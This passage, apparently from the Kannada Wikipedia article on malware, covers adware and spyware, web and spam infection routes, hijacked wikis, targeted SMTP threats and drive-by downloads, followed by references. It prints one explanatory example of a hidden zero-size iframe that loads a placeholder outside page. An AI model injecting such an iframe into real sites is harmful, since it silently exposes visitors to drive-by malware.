ಆ‍ಯ್‌ಡ್‌‍ವೇರ್ ಸ್ಥಾಪನೆಗೊಳ್ಳಲೂ ಸಹ ವಿವೇಚಿಸದೆ ಒಪ್ಪಿಗೆಯನ್ನು ಸೂಚಿಸಿಬಿಡುತ್ತಾರೆ. ಆ‍ಯ್‌ಡ್‌‍ವೇರ್ ಹಲವು ಬಾರಿ ಸ್ಪೈವೇರ್ ಪ್ರೋಗ್ರಾಮ್‌ಗಳ ಸಾಲಿನಲ್ಲಿ ತಾನೂ ಸೇರಿಕೊಂಡು ಸ್ಥಾಪನೆಗೊಳ್ಳುತ್ತದೆ. ಇವೆರಡೂ ಪ್ರೋಗ್ರಾಮ್‌ಗಳು ಒಬ್ಬರಿಗೊಬ್ಬರಿಗೆ ತಮ್ಮ ಕಾರ್ಯಸೂಚಿಗಳನ್ನು ಹಂಚಿಕೊಳ್ಳುತ್ತವೆ. ಸ್ಪೈವೇರ್ ಪ್ರೊಗ್ರಾಮ್‌ಗಳು ಬಳಕೆದಾರನ ಅಂತರಜಾಲ ಸಂಬಂಧಿ ಚಟುವಟಿಕೆಗಳಿಂದ ಆತನ ವ್ಯಕ್ತಿಚಿತ್ರಣವನ್ನು ತಯಾರಿಸುತ್ತದೆ ಮತ್ತು ಆ‍ಯ್‌ಡ್‌‍ವೇರ್ ಪ್ರೊಗ್ರಾಮ್‌ಗಳು ಸಂಗ್ರಹಿಸಿದ ಆತನ ವ್ಯಕ್ತಿಚಿತ್ರಕ್ಕೆ ಸರಿ ಹೊಂದುವ ಜಾಹೀರಾತುಗಳನ್ನು ಪ್ರದರ್ಶಿಸುತ್ತವೆ.

ಜಾಲ ಮತ್ತು ಸ್ಪಾಮ್

[ಬದಲಾಯಿಸಿ]
<iframe

  src="http://example.net/out.ph
  p?s_id=11" width=0 height=0 />
ಒಂದು ವೇಳೆ ಮಧ್ಯಪ್ರವೇಶಕ ಜಾಲತಾಣದ ಪ್ರವೇಶಾಧಿಕಾರವನ್ನು ಹೊಂದಲು ಸಾದ್ಯವಾದರೇ,ಅದನ್ನು ಕೇವಲ ಒಂದು HTML ಮೂಲಾಂಶದ ಸಹಾಯದಿಂದ ಅಪಹರಣ ಮಾಡಬಹುದು.[೨೫]

ವರ್ಲ್ಡ್ ವೈಡ್ ವೆಬ್ ಅಪರಾಧಿಗಳಿಗೆ ಮಾಲ್‌ವೇರನ್ನು ಪಸರಿಸಲು ಹೇಳಿ ಮಾಡಿಸಿದಂತಹ ಹೆದ್ದಾರಿಯಾಗಿದೆ. ಇವತ್ತಿನ ಜಾಲಭೀತಿಗಳು ಮಾಲ್‌ವೆರಿನ ಸಂಯೋಜನೆಗಳನ್ನು ಬಳಸಿಕೊಂಡು ಸೋಂಕಿನ ಸರಪಳಿಗಳನ್ನು ಹುಟ್ಟುಹಾಕುತ್ತಿವೆ. ಹತ್ತರಲ್ಲಿ ಒಂದು ಜಾಲಪುಟವು ದುರಾಗ್ರಹದ ಕೋಡ್‌ಅನ್ನು ಹೊಂದಿರಬಹುದು.[೨೬]

ವಿಕಿಗಳು ಮತ್ತು ಬ್ಲಾಗುಗಳು

[ಬದಲಾಯಿಸಿ]

ನಿರ್ಬಾಧಕ ವಿಕಿಗಳು ಮತ್ತು ಬ್ಲಾಗುಗಳು ಅಪಹರಣಗಳಿಗೆ ನಿರೋಧಕವಾಗಿಲ್ಲ. ಮೊನ್ನೆ ತಾನೇ ವಿಕಿಪಿಡಿಯಾದ ಜರ್ಮನ್ ಅವತರಣಿಕೆಯನ್ನು ವೆಕ್ಟರ್ ಸೋಂಕು ಹರಡಲು ಬಳಸಲಾಗಿತ್ತು ಎಂದು ವರದಿಯಾಗಿತ್ತು.[by whom?] ಸಾಮಾಜಿಕ ಇಂಜಿನಿಯರಿಂಗ್ ಎಂಬ ರೂಪದಲ್ಲಿ, ಹಾನಿಯೆಸಗುವ ಆಶಯದಿಂದ ಬಳಕೆದಾರರು ದುರಾಗ್ರಹದ ತಂತ್ರಾಂಶವನ್ನು ಉಳ್ಳ ಜಾಲಕೊಂಡಿಗಳನ್ನು ಜಾಲಪುಟಕ್ಕೆ ಸೇರಿಸಿದ್ದರು. ಈ ಜಾಲಕೊಂಡಿಗಳು ತಾನು ಹೊಂದಿದ ಜಾಲಪುಟವು, ಜಾಲತಾಣವನ್ನು ರಕ್ಷಿಸಲು ಪತ್ತೆದಾರಿಕೆ ಮತ್ತು ಚಿಕತ್ಸೆಯ ಸೇವೆಯನ್ನು ನೀಡುತ್ತೇವೆ ಎಂದು ಹೇಳಿಕೊಂಡಿದ್ದು, ಬದಲಿಗೆ ಇದು ಸೋಕನ್ನು ಹರಡಲು ಉಪಯೋಗಿಸಿದ ಆಕರ್ಷಣೆ ಮಾತ್ರವಾಗಿತ್ತು.[೨೭]

ಗುರಿಯಿಟ್ಟ ಎಸ್‌ಎಮ್‌ಟಿಪಿ ಭೀತಿಗಳು

[ಬದಲಾಯಿಸಿ]

ಗುರಿಯಿಟ್ಟ ಎಸ್‌ಎಮ್‌ಟಿಪಿ ಭೀತಿಗಳು ತಮ್ಮ ಮೂಲಕ ಮಾಲ್‌ವೇರ್‌ಗಳು ವ್ಯಾಪಕವಾಗಿ ಹರಡಬಲ್ಲ, ಈಗ ತಾನೇ ಬೆಳಕಿಗೆ ಬರುತ್ತಿರುವ ಆಕ್ರಮಣಕಾರ ವೆಕ್ಟರನ್ನು ಪ್ರತಿನಿಧಿಸುತ್ತವೆ. ಬಳಕೆದಾರ ವಿಸ್ತಾರವಾದ ಸ್ಪಾಮ್ ಆಕ್ರಮಣಕ್ಕೆ ಹೊಂದಿಕೊಂಡಾಗ, ಸೈಬರ್ ಅಪರಾಧಿಗಳು ಹಣಕಾಸಿನ ಲಾಭವನ್ನು ಪಡೆಯಲು ನಿಗದಿತ ಸಂಸ್ಥೆ ಅಥವಾ ಉದ್ದಿಮೆಯನ್ನು ಗುರಿಯಿಟ್ಟುಕೊಂಡು ಕ್ರೈಮ್‌ವೇರ್ ಅನ್ನು ಹರಡುತ್ತಾರೆ.[೨೮]

ಎಚ್‌ಟಿಟಿಪಿ ಮತ್ತು ಎಫ್‌ಟಿಪಿ

[ಬದಲಾಯಿಸಿ]

"ಡ್ರೈವ್-ಬೈ" ಡೌನ್‌ಲೋಡ್ ಮುಖಾಂತರ ಬರುವ ಸೋಂಕುಗಳು ಅಂತರಜಾಲದಲ್ಲಿ ಎಚ್‌ಟಿಟಿಪಿ ಮತ್ತು ಎಫ್‌ಟಿಪಿ ಮೂಲಕ ಹರಡುತ್ತವೆ. ಯಾವಾಗ ಶಾಸನಬದ್ಧ ಸರ್ಚ್‌ ಇಂಜಿನ್‌ಗಳು ಕೃತಕ ಮೂಲಪದಗಳನ್ನು ಒಳಗೊಂಡಿರುವ ಸಂಪನ್ಮೂಲಗಳನ್ನು ಸೂಚಿಸಲ್ಪಡುತ್ತವೆಯೋ, ಜೊತೆ ಜೊತೆಗೆ ಶಾಸನಬದ್ಧ ಜಾಲತಾಣಗಳು ಮತ್ತು ಜಾಹಿರಾತು ಸಂಪರ್ಕ ಜಾಲಗಳಿಗೆ ಜಾವಾಸ್ಕ್ರಿಪ್ಟ್‌ನ್ನು ರಹಸ್ಯವಾಗಿ ಅಳವಡಿಸುತ್ತವೆ.[೨೯]

ಇದನ್ನೂ ಗಮನಿಸಿ

[ಬದಲಾಯಿಸಿ]

ಉಲ್ಲೇಖಗಳು

[ಬದಲಾಯಿಸಿ]
  1. "Defining Malware: FAQ". technet.microsoft.com. Retrieved 2009-09-10.
  2. ರಾಜ್ಯ ಶಾಸಕಾಂಗಗಳ ರಾಷ್ಟ್ರೀಯ ಸಮಾವೇಶ ರಾಜ್ಯದಿಂದ ವೈರಸ್/ಕಶ್ಮಲೀಕರಣ/ವಿನಾಶಕಾರಕ ಪ್ರಸಾರಣೆ ನಿಬಂಧನೆ Archived 2009-05-28 ವೇಬ್ಯಾಕ್ ಮೆಷಿನ್ ನಲ್ಲಿ.
  3. jcots.state.va.us/2005%20Content/pdf/Computer%20Contamination%20Bill.pdf [§18.2-152.4:1 Penalty for ಗಣಕ ಕಶ್ಮಲೀಕರಣಕ್ಕೆ ದಂಡನೆ]
  4. "Symantec Internet Security Threat Report: Trends for July-December 2007 (Executive Summary)" (PDF). Symantec Corp. April 2008. p. 29. Archived from the original (PDF) on 2008-06-25. Retrieved 2008-05-11.
  5. "F-Secure Reports Amount of Malware Grew by 100% during 2007" (Press release). F-Secure Corporation. December 4, 2007. Retrieved 2007-12-11.
  6. "F-Secure Quarterly Security Wrap-up for the first quarter of 2008". F-Secure. March 31, 2008. Retrieved 2008-04-25.
  7. "Continuing Business with Malware Infected Customers". Gunter Ollmann. October 2008.
  8. ಪಿಸಿ ವರ್ಲ್ಡ್ - ಜೊಂಬಿ ಪಿಸಿಸ್‌: ಸೈಲೆಂಟ್, ಗ್ರೋಯಿಂಗ್ ಥ್ರೇಟ್ Archived 2008-07-27 ವೇಬ್ಯಾಕ್ ಮೆಷಿನ್ ನಲ್ಲಿ..
  9. Catb.org
  10. https://web.archive.org/web/20091202105753/http://www.usdoj.gov/usao/ma/Press%20Office%20-%20Press%20Release%20Files/IDTheft/Gonzalez,%20Albert%20-%20Indictment%20080508.pdf
  11. ಕೈಜರ್, ಗ್ರೆಗ್ (2007) Monster.com ಡೇಟಾ ಥೇಫ್ಟ್ ಮೇ ಬಿ ಬಿಗ್ಗರ್ ಫ್ರಮ್ http://www.pcworld.com/article/136154/monstercom_data_theft_may_be_bigger.html Archived 2010-04-02 ವೇಬ್ಯಾಕ್ ಮೆಷಿನ್ ನಲ್ಲಿ.
  12. ವಿಜಯಾನ್, ಜಯಕುಮಾರ್(2008) ಹನ್ನಾಫೋರ್ಡ್ ಹಿಟ್ ಬೈ ಕ್ಲಾಸ್-ಆ‍ಯ್‌ಕ್ಷನ್ ಲಾಸೂಟ್ಸ್ ಇನ್ ವೇಕ್ ಆಫ್ ಡೇಟಾ ಬ್ರೀಚ್ ಡಿಸ್‌ಕ್ಲೋಸರ್ ಫ್ರಮ್ http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9070281 Archived 2008-06-05 ವೇಬ್ಯಾಕ್ ಮೆಷಿನ್ ನಲ್ಲಿ.
  13. ಬಿಬಿಸಿ ನ್ಯೂಸ್: ಟ್ರೋಜನ್ ವೈರಸ್ ಸ್ಟೀಲ್ಸ್ ಬ್ಯಾಂಕಿಂಗ್ ಇನ್‌ಫೊ http://news.bbc.co.uk/2/hi/technology/7701227.stm
  14. "ಎಲ್‌ಎನ್‌ಸಿಎಸ್ ೩೭೮೬ - ಕೀ ಫ್ಯಾಕ್ಟರ್ಸ್ ಇನ್‌ಫ್ಲ್ಯೂಯೆನ್ಸ್ ವಾರ್ಮ್ ಇನ್‌ಫೆಕ್ಷನ್", ಯು. ಕನ್ಲಾಯಸಿರಿ, 2006, ವೆಬ್ (ಪಿಡಿಎಫ್): ‍ಎಸ್‌ಎಲ್40-ಪಿಡಿಎಫ್[ಶಾಶ್ವತವಾಗಿ ಮಡಿದ ಕೊಂಡಿ].
  15. ಜಾನ್ ವೊನ್ ನ್ಯೂಮನ್,"ಥಿಯರಿ ಆಫ್ ಸೆಲ್ಫ್-ರಿಪ್ರೊಡ್ಯುಸಿಂಗ್ ಆಟೊಮಾ", ಪಾರ್ಟ್ 1: ಟ್ರಾನ್ಸ್‌ಸ್ಕ್ರೀಪ್ಟ್ಸ್ ಆಪ್ ಲೆಕ್ಚರ್ಸ್ ಗಿವನ್ ಅಟ್ ದಿ ಯೂನಿವರ್ಸಿಟಿ ಆಫ್ ಇಲಿನೊಯಿಸ್, ಯುಎಸ್‌ಎ,೧೯೬೬.
  16. ಫ್ರೆಡ್ ಕೊಹೆನ್, "ಕಂಪ್ಯೂಟರ್ ವೈರಸಸ್", ಪಿಹೆಚ್‌ ಡಿ ಥೀಸಿಸ್, ಸೌಥರ್ನ್ ಕ್ಯಾಲಿಫೊರ್ನಿಯಾ ವಿಶ್ವವಿದ್ಯಾಲಯ, ಎ‌ಎಸ್‌ಪಿ ಪ್ರೆಸ್, ೧೯೮೮.
  17. ಎಲ್.ಎಮ್.ಆಡಲ್‌ಮ್ಯಾನ್, "ಆ‍ಯ್‌ನ್ ಅಬ್‌ಸ್ಟ್ರಾಕ್ಟ್ ಥಿಯರಿ ಆಫ್ ಕಂಪ್ಯೂಟರ್ ವೈರಸ್", ಅಡ್ವಾನ್ಸಸ್ ಇನ್ ಕ್ರೈಪೊಟಾಲಜಿ-- ಕ್ರೈಪ್ಟೊ '೮೮, LNCS ೪೦೩, pp. ೩೫೪-೩೭೪, ೧೯೮೮.
  18. ಎ. ಯಂಗ್, ಎಮ್. ಯಂಗ್, "ಕ್ರೈಪ್ಟೊವಿರಾಲಜಿ: ಎಕ್ಸ್‌ಟೊರ್ಷನ್-ಬೇಸ್ಡ್ ಸೆಕ್ಯೂರಿಟಿ ಥ್ರೇಟ್ಸ್ ಆ‍ಯ್‌೦ಡ್ ಕೌಂಟರ್‌ಮೇಸರ್ಸ್," ಐಇಇಇ ಸಿಂಪೊಸಿಯಂ ಆನ್ ಸೆಕ್ಯೂರಿಟಿ & ಪ್ರೆವಸಿ, pp. ೧೨೯-೧೪೧, ೧೯೯೬.
  19. ಹೆಚ್. ಟೊಯೊಜುಮಿ, ಎ. ಕರಾ. ಪ್ರಿಡೇಟರ್ಸ್: ಗುಡ್ ವಿಲ್ ಮೊಬೈಲ್ ಕೋಡ್ಸ್ ಕಾಂಬಾಟ್ ಎಗೈನಸ್ಟ್ ಕಂಪ್ಯೂಟರ್ ವೈರಸಸ್. ಪ್ರೊಕ್. ಆಫ್ ದಿ 2002 ನ್ಯೂ ಸೆಕ್ಯೂರಿಟಿ ಪ್ಯಾರಾಡಿಮ್ಸ್ ವರ್ಕ್‌ಶಾಪ್, ೨೦೦೨
  20. ಜಾಕಿಯಾ ಎಂ. ಟಾಮಿಮಿ, ಜಾವೆದ್ ಐ. ಖಾನ್, ಮಾಡೆಲ್-ಬೇಸ್ಡ್ ಅನಾಲಿಸಿಸ್ ಆಫ್ ಟು ಪೈಟಿಂಗ್ ವಾರ್ಮ್ಸ್ Archived 2009-09-15 ವೇಬ್ಯಾಕ್ ಮೆಷಿನ್ ನಲ್ಲಿ., ಐಇಇಇ/ಐಐಯು Proc. ಆಫ್ ಐಸಿಸಿಸಿಇ '೦೬, ಕೌಲಾ ಲಂಪುರ್, ಮಲೇಷಿಯಾ, ಮೇ ೨೦೦೬, ಸಂಪುಟ-I, p. ೧೫೭-೧೬೩.
  21. "Other meanings". Archived from the original on 2007-06-30. Retrieved 2007-01-20.ಗ್ರೇವೇರ್ ಅನ್ನು ಮೂಲ ಅಮೇರಿಕನ್ನರ ಮಣ್ಣಿನ ಪಾತ್ರೆಯನ್ನು ವರ್ಣಿಸುವಂತೆಯೂ ಸಹ ಬಳಸಲಾಗಿದೆ ಮತ್ತು ಮಾನವನ ಮೆದುಳಿಗೆ ಆಡುಭಾಷೆಯಂತಿರುವ ಕಂಪ್ಯೂಟರ್ ತಂತ್ರಜ್ಞಾನದಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತಿರುವುದರಿಂದಲೂ ಸಹ ಬಳಸಲಾಗಿದೆ."grayware definition". TechWeb.com. Archived from the original on 2007-09-29. Retrieved 2007-01-02. "grayware definition". TechWeb.com. Archived from the original on 2007-09-29. Retrieved 2007-01-02.
  22. "Greyware". What is greyware? - A word definition from the Webopedia Computer Dictionary. Retrieved 2006-06-05.
  23. Antony Savvas. "The network clampdown". Computer Weekly. Retrieved 2007-01-20.
  24. "Fortinet WhitePaper Protecting networks against spyware, adware and other forms of grayware" (PDF). Archived from the original (PDF) on 2007-01-11. Retrieved 2007-01-20.
  25. Zittrain, Jonathan (Mike Deehan, producer) (2008-04-17). Berkman Book Release: The Future of the Internet - And How to Stop It (video/audio). Cambridge, MA, USA: Berkman Center, The President and Fellows of Harvard College. Archived from the original on 2008-05-13. Retrieved 2008-04-21.
  26. "Google searches web's dark side". BBC News. May 11, 2007. Retrieved 2008-04-26.
  27. "ವಿಕಿಪಿಡಿಯಾ ಹೈಜಾಕ್ಡ್ ಟು ಸ್ಪ್ರೆಡ್ ಮಾಲ್‌ವೇರ್". Archived from the original on 2008-09-25. Retrieved 2009-12-30.
  28. "ಪ್ರೊಟೆಕ್ಟಿಂಗ್ ಕಾರ್ಪೊರೆಟ್ ಅಸ್ಸೆಟ್ಸ್ ಫ್ರಮ್ ಇ-ಮೇಲ್ ಕ್ರೈಮ್‌ವೇರ್," ಅವಿಂಟಿ, Inc., p.1
  29. "F-Secure Quarterly Security Wrap-up for the first quarter of 2008" (Press release). F-Secure. March 31, 2008. Retrieved 2008-03-31.

ಬಾಹ್ಯ ಕೊಂಡಿಗಳು

[ಬದಲಾಯಿಸಿ]